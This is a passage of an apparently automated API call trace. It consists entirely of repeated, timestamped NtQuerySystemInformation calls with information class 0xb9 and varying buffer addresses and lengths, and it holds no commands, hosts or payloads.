ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x28, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, 